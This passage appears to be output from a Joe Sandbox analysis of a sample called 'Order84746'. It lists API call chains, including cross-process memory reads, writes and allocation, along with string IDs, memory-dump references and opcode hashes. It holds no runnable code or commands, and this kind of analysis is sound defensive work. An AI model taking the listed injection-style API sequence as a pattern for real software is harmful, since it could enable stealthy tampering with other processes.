                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: CreateInitializeInstanceUninitialize
                          • String ID: .lnk
                          • API String ID: 948891078-24824748
                          • Opcode ID: c32cf46d56157bfcd71e9651f9dfcbf6a487892a81babbb63ed24d0395250ba2
                          • Instruction ID: 3eba4fc88dcfaa63fb179088b375c0a06745c0dbf555b78e2c7e2e83a08d429b
                          • Opcode Fuzzy Hash: c32cf46d56157bfcd71e9651f9dfcbf6a487892a81babbb63ed24d0395250ba2
                          • Instruction Fuzzy Hash: 91A12B71604205AFD300EF68C891EABB7A8FF99714F40491DF595D7192DBB0EA09CB62
                          APIs
                            • Part of subcall function 008E660F: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,008E53B1,?,?,008E61FF,?,00000000,00000001,00000000), ref: 008E662F
                          • CoInitialize.OLE32(00000000), ref: 0092E85D
                          • CoCreateInstance.COMBASE(0096DA7C,00000000,00000001,0096D8EC,?), ref: 0092E876
                          • CoUninitialize.COMBASE ref: 0092E893
                            • Part of subcall function 008E936C: __swprintf.LIBCMT ref: 008E93AB
                            • Part of subcall function 008E936C: __itow.LIBCMT ref: 008E93DF
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: CreateFullInitializeInstanceNamePathUninitialize__itow__swprintf
                          • String ID: .lnk
                          • API String ID: 2126378814-24824748
                          • Opcode ID: ce62ab6c4912027626f8d066074aef925a316bed4f29a2d8dbd59a17a0e3ed7d
                          • Instruction ID: fa9ce18edbe6e43c2e0f76764000927ce4968d8b2a4a2b4c598ce2f6fece2f62
                          • Opcode Fuzzy Hash: ce62ab6c4912027626f8d066074aef925a316bed4f29a2d8dbd59a17a0e3ed7d
                          • Instruction Fuzzy Hash: 43A146356043119FCB14DF29C484D2ABBE9FF89314F148949F9A69B3A2CB31EC45CB92
                          APIs
                          • __startOneArgErrorHandling.LIBCMT ref: 009032ED
                            • Part of subcall function 0090E0D0: __87except.LIBCMT ref: 0090E10B
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: ErrorHandling__87except__start
                          • String ID: pow
                          • API String ID: 2905807303-2276729525
                          • Opcode ID: d626f8a2301b31244b49062b1ccc7842ffce3a8f537445b3b44e2bba322d03a5
                          • Instruction ID: 7f9be25ab55b2d7a9b50aa643b25920697223145204609924ec33c2a4d9e4ca3
                          • Opcode Fuzzy Hash: d626f8a2301b31244b49062b1ccc7842ffce3a8f537445b3b44e2bba322d03a5
                          • Instruction Fuzzy Hash: 6B514C32A1C2019ECB15B718C98137A2BDCDB81710F64CD69F4E5861E9DF388DD4A646
                          APIs
                          • CharUpperBuffW.USER32(0000000C,00000016,00000016,00000000,00000000,?,00000000,0097DC50,?,0000000F,0000000C,00000016,0097DC50,?), ref: 00924645
                            • Part of subcall function 008E936C: __swprintf.LIBCMT ref: 008E93AB
                            • Part of subcall function 008E936C: __itow.LIBCMT ref: 008E93DF
                          • CharUpperBuffW.USER32(?,?,00000000,?), ref: 009246C5
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: BuffCharUpper$__itow__swprintf
                          • String ID: REMOVE$THIS
                          • API String ID: 3797816924-776492005
                          APIs
                            • Part of subcall function 0092430B: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,0091BC08,?,?,00000034,00000800,?,00000034), ref: 00924335
                          • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 0091C1D3
                            • Part of subcall function 009242D6: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,0091BC37,?,?,00000800,?,00001073,00000000,?,?), ref: 00924300
                            • Part of subcall function 0092422F: GetWindowThreadProcessId.USER32(?,?), ref: 0092425A
                            • Part of subcall function 0092422F: OpenProcess.KERNEL32(00000438,00000000,?,?,?,0091BBCC,00000034,?,?,00001004,00000000,00000000), ref: 0092426A
                            • Part of subcall function 0092422F: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,0091BBCC,00000034,?,?,00001004,00000000,00000000), ref: 00924280
                          • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0091C240
                          • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0091C28D
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                          • String ID: @
                          • API String ID: 4150878124-2766056989
                          APIs
                          • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,0097DC00,00000000,?,?,?,?), ref: 0094A6D8
                          • GetWindowLongW.USER32 ref: 0094A6F5
                          • SetWindowLongW.USER32(?,000000F0,00000000), ref: 0094A705
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: Window$Long
                          • String ID: SysTreeView32
                          • API String ID: 847901565-1698111956
                          APIs
                          • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 0094A15E
                          • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 0094A172
                          • SendMessageW.USER32(?,00001002,00000000,?), ref: 0094A196
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: MessageSend$Window
                          • String ID: SysMonthCal32
                          • API String ID: 2326795674-1439706946
                          APIs
                          • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 0094A941
                          • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 0094A94F
                          • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 0094A956
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: MessageSend$DestroyWindow
                          • String ID: msctls_updown32
                          • API String ID: 4014797782-2298589950
                          APIs
                          • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00949A30
                          • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00949A40
                          • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00949A65
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: MessageSend$MoveWindow
                          • String ID: Listbox
                          • API String ID: 3315199576-2633736733
                          APIs
                          • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 0094A46D
                          • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 0094A482
                          • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 0094A48F
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: MessageSend
                          • String ID: msctls_trackbar32
                          • API String ID: 3850602802-1010561917
                          APIs
                          • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize), ref: 009022A1
                          • GetProcAddress.KERNEL32(00000000), ref: 009022A8
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: AddressLibraryLoadProc
                          • String ID: RoInitialize$combase.dll
                          • API String ID: 2574300362-340411864
                          APIs
                          • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,00902276), ref: 00902376
                          • GetProcAddress.KERNEL32(00000000), ref: 0090237D
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: AddressLibraryLoadProc
                          • String ID: RoUninitialize$combase.dll
                          • API String ID: 2574300362-2819208100
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: LocalTime__swprintf
                          • String ID: %.3d$WIN_XPe
                          • API String ID: 2070861257-2409531811
                          APIs
                          • LoadLibraryA.KERNEL32(kernel32.dll,?,008FE014,74DF0AE0,008FDEF1,0097DC38,?,?), ref: 008FE02C
                          • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 008FE03E
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: AddressLibraryLoadProc
                          • String ID: GetNativeSystemInfo$kernel32.dll
                          • API String ID: 2574300362-192647395
                          APIs
                          • LoadLibraryA.KERNEL32(kernel32.dll,00000000,008E42EC,?,008E42AA,?), ref: 008E4304
                          • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 008E4316
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: AddressLibraryLoadProc
                          • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                          • API String ID: 2574300362-1355242751
                          APIs
                          • LoadLibraryA.KERNEL32(kernel32.dll,?,009421FB,?,009423EF), ref: 00942213
                          • GetProcAddress.KERNEL32(00000000,GetProcessId), ref: 00942225
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: AddressLibraryLoadProc
                          • String ID: GetProcessId$kernel32.dll
                          • API String ID: 2574300362-399901964
                          APIs
                          • LoadLibraryA.KERNEL32(kernel32.dll,008E41BB,008E4341,?,008E422F,?,008E41BB,?,?,?,?,008E39FE,?,00000001), ref: 008E4359
                          • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 008E436B
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: AddressLibraryLoadProc
                          • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                          • API String ID: 2574300362-3689287502
                          • Opcode ID: 6177cb5a6920df831433509a2af699a7fa7a0c400a138f6f39587dc26a1606a2
                          • Instruction ID: 8678cffb719472f809bf67005547b50b0685369ca6e96a938290b5d95c056d30
                          • Opcode Fuzzy Hash: 6177cb5a6920df831433509a2af699a7fa7a0c400a138f6f39587dc26a1606a2
                          • Instruction Fuzzy Hash: B4D0A730918712AFCB244F77E80CA0276D4FB1671DB11851DE895D2250D7F0D8808610
                          APIs
                          • LoadLibraryA.KERNEL32(oleaut32.dll,?,0092051D,?,009205FE), ref: 00920547
                          • GetProcAddress.KERNEL32(00000000,RegisterTypeLibForUser), ref: 00920559
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: AddressLibraryLoadProc
                          • String ID: RegisterTypeLibForUser$oleaut32.dll
                          • API String ID: 2574300362-1071820185
                          • Opcode ID: b65ba6d115340275fe72a426d1dee2e309a60ee4dfa4937d80f3c6d7436b10b8
                          • Instruction ID: 072bac6228bd63a7b0c1495512e115ebafc102997c48b5da0b182c7d956e5536
                          • Opcode Fuzzy Hash: b65ba6d115340275fe72a426d1dee2e309a60ee4dfa4937d80f3c6d7436b10b8
                          • Instruction Fuzzy Hash: 84D0A73091D722AFCB208F26F808A0176E8AB41305B11C41DF496D2155D6F0C8808A50
                          APIs
                          • LoadLibraryA.KERNEL32(oleaut32.dll,00000000,0092052F,?,009206D7), ref: 00920572
                          • GetProcAddress.KERNEL32(00000000,UnRegisterTypeLibForUser), ref: 00920584
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: AddressLibraryLoadProc
                          • String ID: UnRegisterTypeLibForUser$oleaut32.dll
                          • API String ID: 2574300362-1587604923
                          • Opcode ID: cb3f05221d0184b20f97544a74c5b39f4eebf031c53351a74d904b3dd0a6f24a
                          • Instruction ID: a71c79fc019dde7162b9ac3fb6dc5abf50bd885c500532c59d1f362e93ff2a21
                          • Opcode Fuzzy Hash: cb3f05221d0184b20f97544a74c5b39f4eebf031c53351a74d904b3dd0a6f24a
                          • Instruction Fuzzy Hash: 9CD0A730919322AFCB205F36F809F027BECAF45304B11851DF855D2154D7F0C4C08A60
                          APIs
                          • LoadLibraryA.KERNEL32(kernel32.dll,?,0093ECBE,?,0093EBBB), ref: 0093ECD6
                          • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 0093ECE8
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: AddressLibraryLoadProc
                          • String ID: GetSystemWow64DirectoryW$kernel32.dll
                          • API String ID: 2574300362-1816364905
                          • Opcode ID: e19f686058b3116cc0dc2db5e0e8473da95ba51636079d62ee14d657fb45a34b
                          • Instruction ID: 892e28b13ea7547c67e8203d775d2a7f8bd396ca6d4ee6f39b827c0d36bb9959
                          • Opcode Fuzzy Hash: e19f686058b3116cc0dc2db5e0e8473da95ba51636079d62ee14d657fb45a34b
                          • Instruction Fuzzy Hash: 17D0A730918723AFCF245F65E84860677E8EB01705F01841DF895D2190DBF0C8819B10
                          APIs
                          • LoadLibraryA.KERNEL32(kernel32.dll,00000000,0093BAD3,00000001,0093B6EE,?,0097DC00), ref: 0093BAEB
                          • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 0093BAFD
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: AddressLibraryLoadProc
                          • String ID: GetModuleHandleExW$kernel32.dll
                          • API String ID: 2574300362-199464113
                          • Opcode ID: bce2cb678f3ba5e42669bb79bd9a83dd1117b0f22bc48377952ce78e28080c6d
                          • Instruction ID: f6bffa9870f6eb106ff1e4980e8751f921fd1efe9af9d225419ca659c9dd1674
                          • Opcode Fuzzy Hash: bce2cb678f3ba5e42669bb79bd9a83dd1117b0f22bc48377952ce78e28080c6d
                          • Instruction Fuzzy Hash: DED0A730D187129FCB345F66E848B11B6E8AB01304F01441DE953D2154DBF0C880CA10
                          APIs
                          • LoadLibraryA.KERNEL32(advapi32.dll,?,00943BD1,?,00943E06), ref: 00943BE9
                          • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00943BFB
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: AddressLibraryLoadProc
                          • String ID: RegDeleteKeyExW$advapi32.dll
                          • API String ID: 2574300362-4033151799
                          • Opcode ID: 68c035230cdee328c2b77589a69c76cb5056621f334bdda0da8015a5d8ee94df
                          • Instruction ID: 9d1f32637caf418771ae275607a0194b517f1edb97b3783ef9b4bfb225aa69d1
                          • Opcode Fuzzy Hash: 68c035230cdee328c2b77589a69c76cb5056621f334bdda0da8015a5d8ee94df
                          • Instruction Fuzzy Hash: D4D0A7B0918712AFCB205FB5E848E03BAFCAB0231EB21841DE895E2150D6F0C4808E10
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 8546f09329af9c7591f679994f0d238f7932b2002f950df86143830547c7dc76
                          • Instruction ID: 979e6633808876ea70f123a4a230b10bee7652c8050777e99550eea23e415d6a
                          • Opcode Fuzzy Hash: 8546f09329af9c7591f679994f0d238f7932b2002f950df86143830547c7dc76
                          • Instruction Fuzzy Hash: 6CC14D75A0021AEFCB14DF94C894AEEB7B9FF88704F104598E946EB291D730DE81DB90
                          APIs
                          • CoInitialize.OLE32(00000000), ref: 0093AAB4
                          • CoUninitialize.COMBASE ref: 0093AABF
                            • Part of subcall function 00920213: CoCreateInstance.COMBASE(?,00000000,00000005,?,?), ref: 0092027B
                          • VariantInit.OLEAUT32(?), ref: 0093AACA
                          • VariantClear.OLEAUT32(?), ref: 0093AD9D
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
                          • String ID:
                          • API String ID: 780911581-0
                          • Opcode ID: 7db7c9e84e3e22b826280a0eb9e32262c9daafc13033bf3c70051fd80e5b2e52
                          • Instruction ID: 411e3e5373e410ecffd68d9d26560471c7edafbe1706fc7bd3c2f09812f0a424
                          • Opcode Fuzzy Hash: 7db7c9e84e3e22b826280a0eb9e32262c9daafc13033bf3c70051fd80e5b2e52
                          • Instruction Fuzzy Hash: 3CA128752047019FCB10DF29C491B1AB7E9FF89710F144849FA969B3A2CB74ED44CB86
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: Variant$AllocClearCopyInitString
                          • String ID:
                          • API String ID: 2808897238-0
                          • Opcode ID: fa11ecadd8fd9accfa89e64e7ecde28ed1bfca05bb84e48dc48079cd8dffe7a6
                          • Instruction ID: 62d18525929e413e9a1a2ff2a65cf6e8bd6d6647bb36c0db496ae146523992cf
                          • Opcode Fuzzy Hash: fa11ecadd8fd9accfa89e64e7ecde28ed1bfca05bb84e48dc48079cd8dffe7a6
                          • Instruction Fuzzy Hash: 19519430B0430A9BDB249F7AD8A17AEB3E9EF45310F20881FE566C72D1DB7498C19716
                          APIs
                          • GetWindowRect.USER32(00FF6670,?), ref: 0094C544
                          • ScreenToClient.USER32(?,00000002), ref: 0094C574
                          • MoveWindow.USER32(00000002,?,?,?,000000FF,00000001,?,00000002,?,?,?,00000002,?,?), ref: 0094C5DA
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmp
